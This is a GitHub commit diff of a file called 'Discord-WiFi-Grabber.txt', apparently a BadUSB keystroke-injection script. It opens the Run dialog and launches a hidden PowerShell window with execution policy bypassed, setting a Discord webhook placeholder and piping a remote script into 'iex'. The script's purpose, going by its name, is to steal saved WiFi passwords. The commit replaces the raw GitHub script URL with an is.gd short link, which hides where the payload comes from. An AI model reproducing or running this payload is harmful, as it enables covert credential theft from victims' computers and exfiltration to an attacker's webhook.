Update Discord-WiFi-Grabber.txt

This commit is contained in:
egieb
2023-12-29 14:35:10 +00:00
committed by GitHub
parent 92cc2989f6
commit 37bdd079a5

View File

@@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DC-WiFi-Grab.ps1 | iex
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_wifi_to_dc | iex
ENTER